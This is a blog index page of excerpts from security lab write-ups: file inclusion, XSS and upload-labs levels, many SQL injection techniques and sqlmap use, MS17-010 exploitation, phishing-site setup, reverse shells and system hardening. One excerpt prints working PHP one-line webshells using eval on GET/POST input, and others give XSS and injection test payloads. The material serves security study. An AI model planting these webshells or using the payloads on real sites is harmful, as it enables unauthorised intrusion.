- 博客(41)
- 收藏
- 关注
RSS订阅原创 文件包含解析
实验原理1.文件包含函数加载的参数没有经过过滤或者严格定义,可以被用户控制,包含了其他恶意文件,导致执行了非预期的代码。分类:本地文件包含和远程文件包含。2.可利用途径:读取敏感信息、远程包含shell、本地包含配合文件上传;3.php伪协议1,本地文件包含(无视后缀)创建一个index.php文件,然后再创建一个1.txt,文件内容为然后尝试文件包含访问可以显示出来,然后可以尝试更换文件后缀名,在进行尝试后缀名更换为jpg也可以显示出来,在继续更换为ph...
2022-02-28 19:56:33
293
原创 XSS-labs1-5关
第一关查看源代码从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间那么就很明显,这一关主要就是考察反射型xss但是由于不知道服务器端对于提交的敏感字符有没有过滤,所以这里直接在name参数中赋值一个简单的弹窗来进行测试。操作如下:将name参数重新赋值:<script>alert( 'xss ')</ script>点击确定,进入第二关首先查看源代码输入 <script>...
2022-02-24 20:45:40
428
原创 upload-iabs1-5关
upload通关攻略PASS-1(js检测)文件后缀为: jpg/png/gif这三种若想上传一个php文件,直接将该文件的后缀改为以上三种中之一,就可以成功上传。可以先上传一个.jpg的文件,然后用burpsuit抓包抓住流量然后 crtl+R修改文件后缀,然后send然后访问浏览器打开http:llupload-labs/upload/1.php,可以查看到该文件,说明文件上传成功PASS-2(MIME类型)首先先随便下载一个php文件((或者自己写的).
2022-02-24 17:29:07
382
原创 SQL-WAF绕过
实验原理WAF (Web Application Firewall)的中文名称叫做"Web应用防火墙",通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止SQL注入.跨站脚本(XSS)、文件包含和安全配置错误等漏洞引发的攻击。作为攻击者来说,常见的绕过WAF的方式包括大小写变换、编码、重写、巧用注释符、巧用盲注、同功能函数替换等。其中,重写适用于WAF只过滤一次敏感字的情况。比如 WAF过滤敏感字union.但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执
2022-02-22 19:52:28
4000
原创 SQL-SQLMAP进阶使用2
实验原理tamper脚本是SQLMAP中用于绕过waf或应对网站过滤逻辑的脚本。SQLMAP自带了一些tamper脚本,可以在tamper目录下查看它们。用户也可以根据已有的tamper脚本来编写自己的 tamper脚本(绕过逻辑)。1.查看Tamper文件在 Pentest-Atk攻击机上,进入桌面文件夹"tools"->“装机工具"->"sqlmap-master"-> "tamper",选中 space2comment.py 文件,单击鼠标右键,在弹出的菜单中选择"Edit
2022-02-22 19:24:23
156
原创 SQLMAP注入基础使用续集
SQLMAP的基本功能包括:判断可注入的参数、判断可以使用哪一种SQL注入技术进行注入、判断识别数据库的类型以及根据用户的选择从数据库中读取数据。SQLMAP支持的注入技术包括以下五种:(1)基于布尔的盲注:根据返回页面判断条件真假的注入。(2)基于时间的盲注:不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。(3)基于报错的注入:页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。(4)基于联合查询的注入:可以使用UNION的情况下的注入
2022-02-22 17:05:30
749
原创 SQL-SQLMAP进阶使用
1.访问DvWA网站(1)在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的DVWA网站。访问的URL为:http ://[靶机 IP]/dvwal(注意大小写)2.利用Burpsuite 工具抓包(1)启动Burpsuite在攻击机 Pentest-Atk 的桌面文件夹Burp中,鼠标左键双击BURP.cmd程序,启动Burpsuite 。(2)设置Burpsuite的代理服务端口在 Burpsuite 软件界面上选择选项卡"Pr..
2022-02-19 14:10:30
523
原创 SQL-SQLMAP基础使用
SQLMAP是一个开源的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。SQLMAP的基本功能包括:判断可注入的参数、判断可以使用哪一种SQL注入技术进行注入、判断识别数据库的类型以及根据用户的选择从数据库中读取数据。SQLMAP支持的注入技术包括以下五种:( 1)基于布尔的盲注:根据返回页面判断条件真假的注入。(2)基于时间的盲注:不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。(3)基于报错的注入:页面会返回错
2022-02-19 10:44:32
5843
原创 SQL宽字节注入
宽字节注入适用于cms和数据库对字符串的编码方式不统一、WAF利用AddSlashes()等函数对敏感字符进行转义的场景。统一的国际规范的理想状态是所有应用程序都使用Unicode编码,所有的网站都使用UTF-8编码。但因为一些历史原因,国内及国外(特别是非英语国家)的一些cms仍然使用着自己国家的一套编码(如GBK);也有一些cms为了考虑老用户,出了GBK和 UTF-8两个版本。一个GBK编码汉字,占用2个字节;一个UTF-8编码的汉字,占用3-4个字节。当Web应用程序的编码方式为GBK,而
2022-02-19 10:10:52
3348
原创 SQL二阶注入
所谓二阶注入(又称存储型注入)是指已存储(数据库、文件)的用户输入被读取后再次进入到SQL查询语句中导致的注入。二阶注入与普通注入的区别:(1)普通SQL注入:发生在一个 HTTP请求和响应中,对系统的攻击是立即执行的:1)攻击者在 http 请求中提交非法输入;2)应用程序处理非法输入,使用非法输入构造SQL语句;3)在攻击过程中向攻击者返回结果。(2)二阶SQL注入:1)攻击者在 http请求中提交某种经过构思的输入;2)应用程序存储该恶意输入(通常保存在数据库中)以便后面使用并响应请求;3)
2022-02-18 20:20:18
753
原创 SQL布尔,时间盲注
关于布尔盲注某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。一些功能函数的说明length(str):返回字符串 (str)的长度,以字节为单位。substr(str,pos,len):从指定的位置(pos)开始,截取并返回字符串 (str)指定长度(len)的子串。ascii(str):返回字符串 (str)最左边字符的 ASCl码。1.访问SQLi-Labs 网站在
2022-02-18 19:55:14
318
原创 SQL-http头部注入
1.访问SQLi-Labs 网站在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的sQLi-Labs网站Less-11。访问的URL为:http:// [靶机IP]/sqli-labs/Less-18/2.利用Burpsuite 工具抓包启动Burpsuite在攻击机 Pentest-Atk的桌面文件夹 Burp中,鼠标左键双击BURP.cmd程序,启动 Burpsuite 。设置Burpsuite的代理服务端口在Burpsuite 软件界面上选择选
2022-02-18 17:52:02
224
原创 SQL报错注入
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
2022-02-18 15:56:42
592
原创 SQL注入基于联合查询的post注入
访问SQLi-Labs网站在攻击机 Pentest-Atk 打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs网站Less-11。访问的URL为http: //[靶机IP]/sqli-labs/ Less-11/利用Burpsuite 工具抓包启动 Burpsuite在攻击机 Pentest-Atk的桌面文件夹Burp中,鼠标左键双击BURP.cmd程序,启动Burpsuite。将 Burpsuite工具拦截到的HTTP请求包发送至 R..
2022-02-17 09:26:37
123
原创 SQL注入字符型注入
访问sqli-labs网站用火狐浏览器http://ip/sqli-Labs/Less-2/,登陆后先顶一个GET参数,再网址后边加上?id=1显示用户名密码为Dumb可以使用火狐浏览器带的hackbar工具,可以用来调整参数寻找注入点分别使用三条payload寻找注入点和判断注入类型在原来的网址后加上?id=1’运行后报错然后再换成?id=1 and 1=1然后就运行正常再把1=1换成1=2,再显示结果没...
2022-02-17 09:20:07
645
原创 SQL注入,SQL数据库基础
MySQL数据库基础连接数据库,输入命令MySQL -u root -p,然后输入密码为root,然后按回车就可登录显示数据库的所有数据可的名称,输入命令show databases;新建一个数据库,输入命令create database www; 新建成功之后,可以用show databases;查看结果使用数据库 use www在数据库中新建表result在表中result增加数据插入成功之后用命令查询resul..
2022-02-13 17:58:02
541
原创 子域名收集
子域名收集子域名爆破登录kali启动爆破工具subdomainsbrute。然后使用cat命令 cat sangfor.com.cn.txt.搜索引擎搜索指定语法site,搜索子域名使用theharvester工具使用bing搜索引擎进行搜索使用dns爆破参数-c...
2022-01-16 20:57:34
1075
原创 DNS信息查询
利用工具,whois ,nslookup , dig , subdomainsbrute,IP反查针对域名和IP进行信息采集。确定目标 sangforedu.com.cn sangfor.com.cn利用whois工具查询通过查询出来的邮箱,利用站长工具的反查工具进一步查询利用nslookup查询(windows命令行)利用dig工具查询(kali)查询ns记录查询txt记录...
2022-01-16 20:53:07
1961
原创 漏洞攻击,Firefox浏览器插件,set搭建钓鱼网站,hash密码破解
metasploit配置使用实验步骤kali启动metasploit检测靶机是否存在ms17-010漏洞使用ms17_010 eternalblue模块对目标机进行漏洞检测,确认存在ms17-010漏洞输入以下命令最后查看被攻击的靶机IP,发现可以查出来,说明实验成功。(注意:被攻击的靶机是win7的镜像,445的端口没有打开,需要打开445的端口才能攻击成功。)2.firefox浏览器插件启...
2022-01-13 21:53:12
727
原创 GRE实验
配置路由器1interface GigabitEthernet0/0/0ip address 172.16.1.254 255.255.255.0interface GigabitEthernet0/0/1ip address 100.100.100.1 255.255.255.252隧道interface Tunnel0/0/1ip address 1.1.1.1 255.255.255.252tunnel-protocol gresource ...
2021-12-31 09:03:01
184
原创 ospf动态路由协议,vlan配置和三层交换
OSPF动态路由协议拓扑图配置pc的IP,子网掩码和网关Pc1 IP 192.168.1.1 子网掩码 255.255.255.252 网关 192.168.1.2Pc2 IP 192.168.5.2 子网掩码 255.255.255.252 网关 192.168.5.1Pc3 IP 192.168.7.2 子网掩码 255.255.255.252 网关 192.168.7.1配置接口地址R1 int g0/0/0 192.1...
2021-12-23 19:55:43
2695
原创 TCP/IP协议栈模型分析
TCP/IP协议栈模型分析OSI的七种模型1 物理层 在媒介上传输比特流,提供机械和电气的规约。2 数据链路层 将分组数据封装成帧,在数据链路上实现数据的点到点,或点到多点方式的直接通信,差错检测。3 网络层 定义逻辑地址,实现数据从源到目的的转发。4 传输层 建立,维护和取消一次端到端的数据传输过程,控制传输节奏的快慢,调制数据的排序等等。5 会话层 在通信双方之间建立,管理和终止会话。6 表示层 进行数据格式的转换,以确保一个系统生成的应用层数据能够被另一个系统的应用层数据所识别和理解。
2021-12-20 20:09:49
106
原创 Windows隐藏账户处置
实验目的理解windows隐藏账户建立原理,掌握windows隐藏账户处置过程实验环境一台windows server 2012 r2实验原理通过注册表实现隐藏账户的建立,可以通过手工来建立隐藏账户实验步骤实验步骤一、使用命令行创建用户1、打开命令行win+r 输入cmd2、新建test$用户net user test$ sxf!7890 /addnet localgroup administrators test$ /add观察test$用户1、使用系统计..
2021-12-15 20:36:10
90
原创 apache与mysql安全配置
Apache安全配置通过编辑apache配置文件实现apache的安全配置,apache默认配置文件路径是/etc/httpd/conf/httpd.conf确保apache无法访问根目录查看apache配置文件,确定里面对根目录是拒绝所有请求vim /etc/httpd/conf/httpd.conf其中,第一行和第四行,指明了目录,即Linux的根目录 /第二行,表示禁止使用.htaccess文件,覆盖此处配置第三行,表示禁止访问根目录删除网站的目录浏览权限apa
2021-12-13 20:29:21
226
原创 centos和Windows安全配置
Centos安全配置通过配置Centos配置文件,加强Centos默认安全配置。同时也是理解linux一切皆文件的思想。尝试用shell脚本来处置Centos的安全配置。网络配置1、检查不用的连接使用以下命令ip link show up关闭IP转发先查看ip转发配置sysctl net.ipv4.ip_forward查看发现为0,如果是1,可以使用下面命令改为0sysctl -w net.ipv4.ip_forward=0关闭数据包重定向查看数据包.
2021-12-13 20:06:14
769
原创 Windows主机加固
Windows主机加固按win + r 输入 eventvwr.msc, 打开事件查看器查看关键的日志,查看是否关机通过任务类别排序任务类别为(1)的为开机,(2)为系统关机,(10)的磁盘运转,(100)为电源更改,(101)EFI时区更改,(1014)在没有配置的 DNS 服务器响应之后,名称 wpad 的名称解析超时,(157)系统正在进入连接待机状态 ,(158)系统正在退出连接待机状态,(223)usb设备的弹出,(31)查看用户审计是否单独组W
2021-12-09 20:11:39
1313
原创 Windows基础与测评
Windows 基础键盘win+r输入cmd ,弹出命令提示符输入 dir 显示 所有文件Cd . . 返回上一目录Cd xx 进入xx 目录输入 dir /a 显示全部目录文件夹有空格,需要加””反之没有空格就不加””切换到其他硬盘,只需要输D加个:输入md + 文件夹名,创建文件夹输入一个命令+ /? 就知道命令详细输入tree,能看到树状的文件形式Ren 旧文件名 新文件名 //重命名文件输入rd ...
2021-12-08 20:03:10
84
原创 主机系统加固
主机系统加固Linux主机系统加固账号和口令禁用或删除无用账号减少系统无用账号,降低安全风险。操作步骤cat /etc/shadow 查看有多少账户 使用命令 userdel <用户名> 删除不必要的账号。使用命令 passwd -l <用户名> 锁定不必要的账号。使用命令 passwd -u <用户名> 解锁必要的账号。检查特殊账号检查是否存在空口令和root权限的账号。操作步骤查看空口令和root权限...
2021-12-07 20:48:30
126
原创 密码学的应用
openss基础实验openssl是Linux内置的一款开源工具,实现了常见的密码算法与应用。通过openssl操作,完成各种密码算法的应用。创建一个文件,用于被加密,文件内容为12345,文件名为test.txtecho 12345 >test.txt1、对称加密1、使用rc4加解密加密openssl enc -e -rc4 -in test.txt -out test_rc4.enc解密openssl enc -d -rc4 -in test_rc4.enc -o
2021-12-06 19:34:58
338
原创 PHP一句话木马
使用$_GET创建<?phpheader("Content-Type: text/html; charset=gb2312");@eval($_GET['cmd']);?>使用$_POST创建<?phpheader("Content-Type: text/html; charset=gb2312");@eval($_POST['cmd']);?>三 assert<?phpheader("Content-Type: text/h
2021-12-03 19:16:19
170
原创 PHP高级知识
PHP高级知识PHP函数PHP 的真正威力源自于它的函数。在 PHP 中,提供了超过 1000 个内建的函数。创建 PHP 函数函数是通过调用函数来执行的。<?phpfunctionfunctionName(){// 要执行的代码}?>PHP 函数准则:函数的名称应该提示出它的功能函数名称以字母或下划线开头(不能以数字开头)PHP 函数 - 添加参数为了给函数添加更多的功能,我们可以添加参数,参数类似变量。参数就在函数名称后面的一个...
2021-12-03 11:57:45
331
原创 PHP进阶教程
PHP进阶PHP数据类型 :String(字符串), Integer(整型), Float(浮点型), Boolean(布尔型), Array(数组), Object(对象), NULL(空值)。PHP 字符串一个字符串是一串字符的序列,就像 "Hello world!"。你可以将任何文本放在单引号和双引号中。实列 <?php$x= "Hello world!"; echo$x; echo"<br>"; $x= 'Hello world!'; echo$...
2021-12-01 20:00:48
672
原创 Java Script与PHP
Java Script与PHPJava script含义:JavaScript 是互联网上最流行的脚本语言,这门语言可用于 HTML 和 web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备。JavaScript 是脚本语言JavaScript 是一种轻量级的编程语言。JavaScript 是可插入 HTML 页面的编程代码。JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。JavaScript 很容易学习。Java script的用
2021-11-30 20:39:58
735
原创 HTML基本信息,编码,状态信息
HTML基本信息 <!DOCTYPE> 定义文档类型。 <html> 定义一个 HTML 文档 <title> 为文档定义一个标题 <body> 定义文档的主体 <h1> to <h6> 定义 HTML 标题 <.
2021-11-30 08:58:37
103
原创 Linux解压压缩
Linux压缩解压命令解压缩是一种常用的操作,在Linux中常用的命令是tar命令tra命令tar [主选项 + 辅选项] 文件或目录示例:# 压缩文件 file1 和目录 dir2 到 test.tar.gztar -zcvf test.tar.gz file1 dir2# 解压 test.tar.gz(将 c 换成 x 即可)tar -zxvf test.tar.gz# 列出压缩文件的内容tar -ztvf test.tar.gz 释义:-.
2021-11-29 13:55:00
207
原创 Linux反弹命令
反弹shell反弹shell的含义:反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。反弹shell需要用到哪里,通常用于被控端因防火墙受限、权限不足、端口被占用等情形。1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。2.目标机器的ip动态改变,你不能持续控制。3.由于防火
2021-11-27 09:18:24
1718
原创 Linuxgrep与sed与awk和网站搭建
Linux之grep与正则表达式熟练掌握grep命令用法grep命令用于查找文件里符合条件的字符串,查找包含指定的范本样式的文件,如果发现某文件的内容符合所指定的范本样式,则会把含有范本样式的那一行显示出来。grep 选项 需要捕获的文字 目标文件如果我们从/etc/passwd中查找tcpdump相关的用户信息grep tcpdump/etc/passwd-A 显示捕获行之后行数-B 显示捕获行之前行数-C 显示捕获行前后的行数-c 显示符合条件的行数- .
2021-11-26 17:10:42
717
原创 Linux中非常常用的基础指令
Linux常用命令Linux中非常常用的基础指令1.Mkdir 指令创建目录 mkdir 路径2.Touch 指令创建文件 touch 文件路径3.Df指令查看磁盘的空间 df -h 表示以可读性较高的形式展示大小4.Free指令查看内存使用情况 free-m 表示以mb为单位查看5.Date指令表示操作时间日期#date输出的形式:2018年3月24日星期六15:54:28#date +%F(等价...
2021-11-25 17:07:19
57
原创 linux基础问题
Linux忘记root密码如何登陆!方法如下:重启系统,在开机过程中,快速按下键盘上的方向键↑和↓。目的是告知引导程序,我们需要在引导页面选择不同的操作,以便让引导程序暂停。2,使用↑和↓将选择行设置为第一行(背景高亮即为选中),按下键盘上的e,进入编辑模式3,将光标一直移动到 LANG=en_US.UTF-8 后面,空格,再追加init=/bin/sh。这里特别注意,需要写在UTF-8后,保持在同一行,并注意空格。有些虚拟机由于屏幕太小,会自动添加\换行,这个是正常的。按下CTR
2021-11-24 19:09:34
99
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人